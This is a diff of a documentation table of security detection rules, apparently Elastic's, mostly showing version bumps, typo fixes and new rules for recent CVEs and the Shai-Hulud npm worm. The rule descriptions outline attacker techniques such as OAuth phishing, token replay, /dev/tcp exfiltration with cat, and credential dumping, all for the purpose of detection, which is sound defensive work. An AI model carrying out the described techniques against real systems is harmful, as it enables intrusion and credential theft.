While this client ID is legitimately used by Visual Studio Code, threat actors have been observed abusing it in phishing campaigns to make OAuth requests appear trustworthy. These attacks rely on redirect URIs such as VSCode's Insiders redirect location, prompting victims to return an OAuth authorization code that can be exchanged for access tokens. This rule may help identify unauthorized use of the VS Code OAuth flow as part of social engineering or credential phishing activity. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Sign-in Logs], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Initial Access] |None |3 +|<> |Detects potentially suspicious OAuth authorization activity in Microsoft Entra ID where the Visual Studio Code first-party application (client_id = aebc6443-996d-45c2-90f0-388ff96faa56) is used to request access to Microsoft Graph resources. While this client ID is legitimately used by Visual Studio Code, threat actors have been observed abusing it in phishing campaigns to make OAuth requests appear trustworthy. These attacks rely on redirect URIs such as VSCode's Insiders redirect location, prompting victims to return an OAuth authorization code that can be exchanged for access tokens. This rule may help identify unauthorized use of the VS Code OAuth flow as part of social engineering or credential phishing activity. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Sign-in Logs], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Initial Access] |None |4 |<> |Identifies Microsoft Entra ID Protection sign-in risk detections triggered by a range of risk events such as anonymized IP addresses, password spray attacks, impossible travel, token anomalies, and more. These detections are often early indicators of potential account compromise or malicious sign-in behavior. This is a promotion rule intended to surface all Entra ID sign-in risk events for further investigation and correlation with other identity-related activity. This is a building block rule that is used to collect all Microsoft Entra ID Protection sign-in or user risk detections. It is not intended to be used as a standalone detection. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Protection], [Data Source: Microsoft Entra ID Protection Logs], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Rule Type: BBR] |None |1 -|<> |Identifies rare instances of authentication requirements for Azure Entra ID principal users. An adversary with stolen credentials may attempt to authenticate with unusual authentication requirements, which is a rare event and may indicate an attempt to bypass conditional access policies (CAP) and multi-factor authentication (MFA) requirements. The authentication requirements specified may not be commonly used by the user based on their historical sign-in activity. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Sign-in Logs], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Tactic: Initial Access], [Resources: Investigation Guide] |None |4 +|<> |Identifies sequence of events where a Microsoft Entra ID protection alert is followed by an attempt to register a new device by the same user principal. 
This behavior may indicate an adversary using a compromised account to register a device, potentially leading to unauthorized access to resources or persistence in the environment. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Protection Logs], [Data Source: Microsoft Entra ID Audit Logs], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Persistence] |None |1 + +|<> |Identifies rare instances of authentication requirements for Azure Entra ID principal users. An adversary with stolen credentials may attempt to authenticate with unusual authentication requirements, which is a rare event and may indicate an attempt to bypass conditional access policies (CAP) and multi-factor authentication (MFA) requirements. The authentication requirements specified may not be commonly used by the user based on their historical sign-in activity. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Sign-in Logs], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Tactic: Initial Access], [Resources: Investigation Guide] |None |5 |<> |Identifies when a new service principal is added in Microsoft Entra ID. An application, hosted service, or automated tool that accesses or modifies resources needs an identity created. This identity is known as a service principal. For security reasons, it's always recommended to use service principals with automated tools rather than allowing them to log in with a user identity. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Audit Logs], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Persistence] |None |108 @@ -1300,13 +1318,13 @@ and their rule type is `machine_learning`. |<> |This rule detects non-interactive authentication activity against SharePoint Online (`Office 365 SharePoint Online`) by a user principal via the `Microsoft Authentication Broker` application. The session leverages a refresh token or Primary Refresh Token (PRT) without interactive sign-in, often used in OAuth phishing or token replay scenarios. |[Domain: Cloud], [Use Case: Identity and Access Audit], [Tactic: Collection], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Sign-in Logs], [Resources: Investigation Guide] |None |2 -|<> |Identifies potential brute-force attacks targeting user accounts by analyzing failed sign-in patterns in Microsoft Entra ID Sign-In Logs. This detection focuses on a high volume of failed interactive or non-interactive authentication attempts within a short time window, often indicative of password spraying, credential stuffing, or password guessing. Adversaries may use these techniques to gain unauthorized access to applications integrated with Entra ID or to compromise valid user accounts. |[Domain: Cloud], [Domain: Identity], [Data Source: Azure], [Data Source: Entra ID], [Data Source: Entra ID Sign-in Logs], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide] |None |4 +|<> |Identifies potential brute-force attacks targeting user accounts by analyzing failed sign-in patterns in Microsoft Entra ID Sign-In Logs. 
This detection focuses on a high volume of failed interactive or non-interactive authentication attempts within a short time window, often indicative of password spraying, credential stuffing, or password guessing. Adversaries may use these techniques to gain unauthorized access to applications integrated with Entra ID or to compromise valid user accounts. |[Domain: Cloud], [Domain: Identity], [Data Source: Azure], [Data Source: Entra ID], [Data Source: Entra ID Sign-in Logs], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide] |None |5 |<> |Detects a sequence of events in Microsoft Entra ID indicative of a suspicious cloud-based device registration, potentially using ROADtools. This behavior involves adding a device via the Device Registration Service, followed by the assignment of registered users and owners — a pattern consistent with techniques used to establish persistence or acquire a Primary Refresh Token (PRT). ROADtools, a popular red team toolkit, often leaves distinct telemetry signatures such as the `Microsoft.OData.Client` user agent and specific OS version values. These sequences are uncommon in typical user behavior and may reflect abuse of device trust for session hijacking or silent token replay. |[Domain: Cloud], [Domain: Identity], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Audit Logs], [Use Case: Identity and Access Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |1 |<> |Identifies potential session hijacking or token replay in Microsoft Entra ID. This rule detects cases where a user signs in and subsequently accesses Microsoft Graph from a different IP address using the same session ID. This may indicate a successful OAuth phishing attack, session hijacking, or token replay attack, where an adversary has stolen a session cookie or refresh/access token and is impersonating the user from an alternate host or location. |[Domain: Cloud], [Domain: Identity], [Domain: API], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Sign-In Logs], [Data Source: Microsoft Graph], [Data Source: Microsoft Graph Activity Logs], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Resources: Investigation Guide], [Tactic: Defense Evasion], [Tactic: Initial Access] |None |5 -|<> |Identifies suspicious activity reported by users in Microsoft Entra ID where users have reported suspicious activity related to their accounts, which may indicate potential compromise or unauthorized access attempts. Reported suspicious activity typically occurs during the authentication process and may involve various authentication methods, such as password resets, account recovery, or multi-factor authentication challenges. Adversaries may attempt to exploit user accounts by leveraging social engineering techniques or other methods to gain unauthorized access to sensitive information or resources. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Audit Logs], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Initial Access] |None |2 +|<> |Identifies suspicious activity reported by users in Microsoft Entra ID where users have reported suspicious activity related to their accounts, which may indicate potential compromise or unauthorized access attempts. 
Reported suspicious activity typically occurs during the authentication process and may involve various authentication methods, such as password resets, account recovery, or multi-factor authentication challenges. Adversaries may attempt to exploit user accounts by leveraging social engineering techniques or other methods to gain unauthorized access to sensitive information or resources. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Audit Logs], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Initial Access] |None |3
|<> |Identifies suspicious processes being spawned by the Microsoft Exchange Server Unified Messaging (UM) service. This activity has been observed exploiting CVE-2021-26857. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Tactic: Lateral Movement], [Data Source: Elastic Endgame], [Use Case: Vulnerability], [Data Source: Elastic Defend], [Data Source: Windows Security Event Logs], [Data Source: Microsoft Defender for Endpoint], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |316
@@ -1316,7 +1334,7 @@ and their rule type is `machine_learning`.
|<> |Identifies suspicious processes being spawned by the Microsoft Exchange Server worker process (w3wp). This activity may indicate exploitation activity or access to an existing web shell backdoor. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: Microsoft Defender for Endpoint], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |313
-|<> |This New Terms rule focuses on the first occurrence of a client application ID (azure.graphactivitylogs.properties.app_id) making a request to Microsoft Graph API for a specific tenant ID (azure.tenant_id) and user principal object ID (azure.graphactivitylogs.properties.user_principal_object_id). This rule may helps identify unauthorized access or actions performed by compromised accounts. Advesaries may succesfully compromise a user's credentials and use the Microsoft Graph API to access resources or perform actions on behalf of the user. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Graph], [Data Source: Microsoft Graph Activity Logs], [Resources: Investigation Guide], [Use Case: Identity and Access Audit], [Tactic: Initial Access] |None |3
+|<> |This New Terms rule focuses on the first occurrence of a client application ID (azure.graphactivitylogs.properties.app_id) making a request to Microsoft Graph API for a specific tenant ID (azure.tenant_id) and user principal object ID (azure.graphactivitylogs.properties.user_principal_object_id). This rule may help identify unauthorized access or actions performed by compromised accounts. Adversaries may successfully compromise a user's credentials and use the Microsoft Graph API to access resources or perform actions on behalf of the user. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Graph], [Data Source: Microsoft Graph Activity Logs], [Resources: Investigation Guide], [Use Case: Identity and Access Audit], [Tactic: Initial Access] |None |4
|<> |Identifies use of aspnet_regiis to decrypt Microsoft IIS connection strings.
An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Windows Security Event Logs], [Data Source: Microsoft Defender for Endpoint], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |316 @@ -1368,13 +1386,13 @@ and their rule type is `machine_learning`. |<> |This rule uses alert data to determine when multiple alerts in different phases of an attack involving the same host are triggered. Analysts can use this to prioritize triage and response, as these hosts are more likely to be compromised. |[Use Case: Threat Detection], [Rule Type: Higher-Order Rule], [Resources: Investigation Guide] |None |6 -|<> |This rule detects when a specific Okta actor has multiple device token hashes for a single Okta session. This may indicate an authenticated session has been hijacked or is being used by multiple devices. Adversaries may hijack a session to gain unauthorized access to Okta admin console, applications, tenants, or other resources. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Credential Access], [Domain: SaaS], [Resources: Investigation Guide] |None |307 +|<> |This rule detects when a specific Okta actor has multiple device token hashes for a single Okta session. This may indicate an authenticated session has been hijacked or is being used by multiple devices. Adversaries may hijack a session to gain unauthorized access to Okta admin console, applications, tenants, or other resources. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Credential Access], [Domain: SaaS], [Resources: Investigation Guide] |None |308 |<> |Identifies multiple logon failures followed by a successful one from the same source address. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to accounts. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide], [Data Source: Windows Security Event Logs] |None |115 |<> |Identifies multiple consecutive logon failures from the same source address and within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to accounts. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide], [Data Source: Windows Security Event Logs] |None |114 -|<> |Detects a burst of Microsoft 365 user account lockouts within a short 5-minute window. A high number of IdsLocked login errors across multiple user accounts may indicate brute-force attempts for the same users resulting in lockouts. |[Domain: Cloud], [Domain: SaaS], [Data Source: Microsoft 365], [Data Source: Microsoft 365 Audit Logs], [Use Case: Threat Detection], [Use Case: Identity and Access Audit], [Tactic: Credential Access], [Resources: Investigation Guide] |None |3 +|<> |Detects a burst of Microsoft 365 user account lockouts within a short 5-minute window. 
A high number of IdsLocked login errors across multiple user accounts may indicate brute-force attempts for the same users resulting in lockouts. |[Domain: Cloud], [Domain: SaaS], [Data Source: Microsoft 365], [Data Source: Microsoft 365 Audit Logs], [Use Case: Threat Detection], [Use Case: Identity and Access Audit], [Tactic: Credential Access], [Resources: Investigation Guide] |None |4 |<> |Identifies more than two Microsoft Entra ID Protection alerts associated to the user principal in a short time period. Microsoft Entra ID Protection alerts are triggered by suspicious sign-in activity, such as anomalous IP addresses, risky sign-ins, or other risk detections. Multiple alerts in a short time frame may indicate an ongoing attack or compromised account. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Protection Logs], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Initial Access] |None |2 @@ -1382,9 +1400,9 @@ and their rule type is `machine_learning`. |<> |Detects when Okta user authentication events are reported for multiple users with the same device token hash behind a proxy. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Credential Access], [Resources: Investigation Guide] |None |210 -|<> |Detects when a certain threshold of Okta user authentication events are reported for multiple users from the same client address. Adversaries may attempt to launch a credential stuffing or password spraying attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Credential Access], [Resources: Investigation Guide] |None |206 +|<> |Detects when a certain threshold of Okta user authentication events are reported for multiple users from the same client address. Adversaries may attempt to launch a credential stuffing or password spraying attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Credential Access], [Resources: Investigation Guide] |None |207 -|<> |Detects when a high number of Okta user authentication events are reported for multiple users in a short time frame. Adversaries may attempt to launch a credential stuffing or password spraying attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Credential Access], [Resources: Investigation Guide] |None |206 +|<> |Detects when a high number of Okta user authentication events are reported for multiple users in a short time frame. Adversaries may attempt to launch a credential stuffing or password spraying attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Credential Access], [Resources: Investigation Guide] |None |207 |<> |Windows Credential Manager allows you to create, view, or delete saved credentials for signing into websites, connected applications, and networks. An adversary may abuse this to list or dump credentials stored in the Credential Manager for saved usernames and passwords. This may also be performed in preparation of lateral movement. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Windows Security Event Logs], [Resources: Investigation Guide] |None |115
@@ -1406,7 +1424,7 @@ and their rule type is `machine_learning`.
|<> |This rule monitors for the execution of the cat command, followed by a connection attempt by the same process. Cat is capable of transferring data via tcp/udp channels by redirecting its read output to a /dev/tcp or /dev/udp channel. This activity is highly suspicious, and should be investigated. Attackers may leverage this capability to transfer tools or files to another host in the network or exfiltrate data while attempting to evade detection in the process. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |10
-|<> |Identifies DNS queries to commonly abused Top Level Domains by common LOLBINs or executable running from world writable directories or unsigned binaries. This behavior matches on common malware C2 abusing less formal domain names. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Windows Security Event Logs], [Data Source: SentinelOne], [Data Source: Crowdstrike], [Data Source: Sysmon] |None |2
+|<> |Identifies DNS queries to commonly abused Top Level Domains by common LOLBINs or executables running from world-writable directories or unsigned binaries. This behavior matches on common malware C2 abusing less formal domain names. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Windows Security Event Logs], [Data Source: SentinelOne], [Data Source: Crowdstrike], [Data Source: Sysmon] |None |3
|<> |This rule identifies an egress internet connection initiated by an SSH Daemon child process. This behavior is indicative of the alteration of a shell configuration file or other mechanism that launches a process when a new SSH login occurs. Attackers can also backdoor the SSH daemon to allow for persistence, call out to a C2 or to steal credentials. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |7
@@ -1452,19 +1470,21 @@ and their rule type is `machine_learning`.
|<> |A new user was added to a GitHub organization. |[Domain: Cloud], [Use Case: Threat Detection], [Use Case: UEBA], [Tactic: Persistence], [Rule Type: BBR], [Data Source: Github] |None |206
-|<> |Identifies a new or modified federation domain, which can be used to create a trust between O365 and an external identity provider. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Identity and Access Audit], [Tactic: Privilege Escalation], [Resources: Investigation Guide] |None |210
+|<> |Identifies a new or modified federation domain, which can be used to create a trust between O365 and an external identity provider. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Identity and Access Audit], [Tactic: Privilege Escalation], [Resources: Investigation Guide] |None |211
+
+|<> |This rule detects the execution of Node.js pre or post-install scripts.
These scripts are executed by the Node.js package manager (npm) during the installation of packages. Adversaries may abuse this technique to execute arbitrary commands on the system and establish persistence. This activity was observed in the wild as part of the Shai-Hulud worm. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Execution], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |1 |<> |Nping ran on a Linux host. Nping is part of the Nmap tool suite and has the ability to construct raw packets for a wide variety of security testing applications, including denial of service testing. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Auditd Manager], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |212 |<> |Identifies NullSessionPipe registry modifications that specify which pipes can be accessed anonymously. This could be indicative of adversary lateral movement preparation by making the added pipe available to everyone. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: Microsoft Defender for Endpoint], [Data Source: SentinelOne], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |314 -|<> |Detects the occurrence of emails reported as Phishing or Malware by Users. Security Awareness training is essential to stay ahead of scammers and threat actors, as security products can be bypassed, and the user can still receive a malicious message. Educating users to report suspicious messages can help identify gaps in security controls and prevent malware infections and Business Email Compromise attacks. |[Domain: Cloud], [Data Source: Microsoft 365], [Tactic: Initial Access], [Resources: Investigation Guide] |None |209 +|<> |Detects the occurrence of emails reported as Phishing or Malware by Users. Security Awareness training is essential to stay ahead of scammers and threat actors, as security products can be bypassed, and the user can still receive a malicious message. Educating users to report suspicious messages can help identify gaps in security controls and prevent malware infections and Business Email Compromise attacks. |[Domain: Cloud], [Data Source: Microsoft 365], [Tactic: Initial Access], [Resources: Investigation Guide] |None |210 -|<> |Identifies accounts with a high number of single sign-on (SSO) logon errors. Excessive logon errors may indicate an attempt to brute force a password or SSO token. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Identity and Access Audit], [Tactic: Credential Access], [Resources: Investigation Guide] |None |210 +|<> |Identifies accounts with a high number of single sign-on (SSO) logon errors. Excessive logon errors may indicate an attempt to brute force a password or SSO token. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Identity and Access Audit], [Tactic: Credential Access], [Resources: Investigation Guide] |None |211 -|<> |Detects the occurrence of mailbox audit bypass associations. The mailbox audit is responsible for logging specified mailbox events (like accessing a folder or a message or permanently deleting a message). 
However, actions taken by some authorized accounts, such as accounts used by third-party tools or accounts used for lawful monitoring, can create a large number of mailbox audit log entries and may not be of interest to your organization. Because of this, administrators can create bypass associations, allowing certain accounts to perform their tasks without being logged. Attackers can abuse this allowlist mechanism to conceal actions taken, as the mailbox audit will log no activity done by the account. |[Domain: Cloud], [Data Source: Microsoft 365], [Tactic: Initial Access], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |209 +|<> |Detects the occurrence of mailbox audit bypass associations. The mailbox audit is responsible for logging specified mailbox events (like accessing a folder or a message or permanently deleting a message). However, actions taken by some authorized accounts, such as accounts used by third-party tools or accounts used for lawful monitoring, can create a large number of mailbox audit log entries and may not be of interest to your organization. Because of this, administrators can create bypass associations, allowing certain accounts to perform their tasks without being logged. Attackers can abuse this allowlist mechanism to conceal actions taken, as the mailbox audit will log no activity done by the account. |[Domain: Cloud], [Data Source: Microsoft 365], [Tactic: Initial Access], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |210 -|<> |Detects a change to the OpenID Connect (OIDC) discovery URL in the Entra ID Authentication Methods Policy. This behavior may indicate an attempt to federate Entra ID with an attacker-controlled identity provider, enabling bypass of multi-factor authentication (MFA) and unauthorized access through bring-your-own IdP (BYOIDP) methods. |[Domain: Cloud], [Domain: Identity], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Audit Logs], [Use Case: Identity and Access Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |3 +|<> |Detects a change to the OpenID Connect (OIDC) discovery URL in the Entra ID Authentication Methods Policy. This behavior may indicate an attempt to federate Entra ID with an attacker-controlled identity provider, enabling bypass of multi-factor authentication (MFA) and unauthorized access through bring-your-own IdP (BYOIDP) methods. |[Domain: Cloud], [Domain: Identity], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Audit Logs], [Use Case: Identity and Access Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |4 |<> |Identifies the modification of the Microsoft Office "Office Test" Registry key, a registry location that can be used to specify a DLL which will be executed every time an MS Office application is started. Attackers can abuse this to gain persistence on a compromised host. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Data Source: Microsoft Defender for Endpoint], [Data Source: SentinelOne], [Data Source: Crowdstrike], [Data Source: Sysmon], [Resources: Investigation Guide] |None |107 @@ -1478,9 +1498,9 @@ and their rule type is `machine_learning`. |<> |A user has initiated a session impersonation granting them access to the environment with the permissions of the user they are impersonating. 
This would likely indicate Okta administrative access and should only ever occur if requested and expected. |[Use Case: Identity and Access Audit], [Tactic: Credential Access], [Data Source: Okta], [Resources: Investigation Guide] |None |414
-|<> |Detects when a specific Okta actor has multiple sessions started from different geolocations. Adversaries may attempt to launch an attack by using a list of known usernames and passwords to gain unauthorized access to user accounts from different locations. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Initial Access], [Resources: Investigation Guide] |None |307
+|<> |Detects when a specific Okta actor has multiple sessions started from different geolocations. Adversaries may attempt to launch an attack by using a list of known usernames and passwords to gain unauthorized access to user accounts from different locations. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Initial Access], [Resources: Investigation Guide] |None |308
-|<> |Identifies the occurence of files uploaded to OneDrive being detected as Malware by the file scanning engine. Attackers can use File Sharing and Organization Repositories to spread laterally within the company and amplify their access. Users can inadvertently share these files without knowing their maliciousness, giving adversaries opportunity to gain initial access to other endpoints in the environment. |[Domain: Cloud], [Data Source: Microsoft 365], [Tactic: Lateral Movement], [Resources: Investigation Guide] |None |209
+|<> |Identifies the occurrence of files uploaded to OneDrive being detected as Malware by the file scanning engine. Attackers can use File Sharing and Organization Repositories to spread laterally within the company and amplify their access. Users can inadvertently share these files without knowing their maliciousness, giving adversaries the opportunity to gain initial access to other endpoints in the environment. |[Domain: Cloud], [Data Source: Microsoft 365], [Tactic: Lateral Movement], [Resources: Investigation Guide] |None |210
|<> |This rule detects the usage of the `openssl` binary to generate password hashes on Linux systems. The `openssl` command is a cryptographic utility that can be used to generate password hashes. Attackers may use `openssl` to generate password hashes for new user accounts or to change the password of existing accounts, which can be leveraged to maintain persistence on a Linux system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Auditd Manager], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |4
@@ -1552,7 +1572,7 @@ and their rule type is `machine_learning`.
|<> |Active Directory Integrated DNS (ADIDNS) is one of the core components of AD DS, leveraging AD's access control and replication to maintain domain consistency. It stores DNS zones as AD objects, a feature that, while robust, introduces some security issues, such as wildcard records, mainly because of the default permission (Any authenticated users) to create DNS-named records. Attackers can create wildcard records to redirect traffic that doesn't explicitly match records contained in the zone, becoming the Man-in-the-Middle and being able to abuse DNS similarly to LLMNR/NBNS spoofing.
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Active Directory], [Use Case: Active Directory Monitoring], [Data Source: Windows Security Event Logs], [Resources: Investigation Guide] |None |107
-|<> |Identifies potential ransomware note being uploaded to an AWS S3 bucket. This rule detects the `PutObject` S3 API call with a common ransomware note file extension such as `.ransom`, or `.lock`. Adversaries with access to a misconfigured S3 bucket may retrieve, delete, and replace objects with ransom notes to extort victims. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS S3], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide] |None |6
+|<> |Identifies a potential ransomware note being uploaded to an AWS S3 bucket. This rule detects the PutObject S3 API call with a common ransomware note file name or extension such as ransom or .lock. Adversaries with access to a misconfigured S3 bucket may retrieve, delete, and replace objects with ransom notes to extort victims. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS S3], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide] |None |7
|<> |Detects potential resource exhaustion or data breach attempts by monitoring for users who consistently generate high input token counts, submit numerous requests, and receive large responses. This behavior could indicate an attempt to overload the system or extract an unusually large amount of data, possibly revealing sensitive information or causing service disruptions. |[Domain: LLM], [Data Source: AWS Bedrock], [Data Source: Amazon Web Services], [Data Source: AWS S3], [Use Case: Potential Overload], [Use Case: Resource Exhaustion], [Mitre Atlas: LLM04], [Resources: Investigation Guide] |None |5
@@ -1570,8 +1590,14 @@ and their rule type is `machine_learning`.
|<> |Detects potential buffer overflow attacks by querying the "Segfault Detected" pre-built rule signal index, through a threshold rule, with a minimum number of 100 segfault alerts in a short timespan. A large amount of segfaults in a short time interval could indicate application exploitation attempts. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Initial Access], [Use Case: Vulnerability], [Rule Type: Higher-Order Rule], [Resources: Investigation Guide] |None |4
+|<> |Detects suspicious creation of the nsswitch.conf file, outside of the regular /etc/nsswitch.conf path, consistent with attempts to exploit CVE-2025-32463 (the "sudo chroot" privilege escalation), where an attacker tricks sudo into using attacker-controlled NSS files or libraries to gain root. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Defend], [Data Source: SentinelOne], [Data Source: Crowdstrike], [Data Source: Elastic Endgame], [Data Source: Auditd Manager], [Use Case: Vulnerability], [Resources: Investigation Guide] |None |1
+
+|<> |Detects suspicious use of sudo's --chroot / -R option consistent with attempts to exploit CVE-2025-32463 (the "sudo chroot" privilege escalation), where an attacker tricks sudo into using attacker-controlled NSS files or libraries to gain root.
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Defend], [Data Source: SentinelOne], [Data Source: Crowdstrike], [Data Source: Elastic Endgame], [Data Source: Auditd Manager], [Use Case: Vulnerability], [Resources: Investigation Guide] |None |1
+
|<> |Identifies a suspicious Diagnostics Utility for Internet Explorer child process. This may indicate the successful exploitation of the vulnerability CVE-2025-33053. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: Microsoft Defender for Endpoint], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |1
+|<> |This rule looks for processes that behave like an attacker trying to exploit a known vulnerability in VMware tools (CVE-2025-41244). The vulnerable behavior involves the VMware tools service or its discovery scripts executing other programs to probe their version strings. An attacker can place a malicious program in a writable location (for example /tmp) and have the tools execute it with elevated privileges, resulting in local privilege escalation. The rule flags launches where vmtoolsd or the service discovery scripts start other child processes. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Defend], [Data Source: SentinelOne], [Data Source: Crowdstrike], [Data Source: Elastic Endgame], [Data Source: Auditd Manager], [Use Case: Vulnerability], [Resources: Investigation Guide] |None |1
+
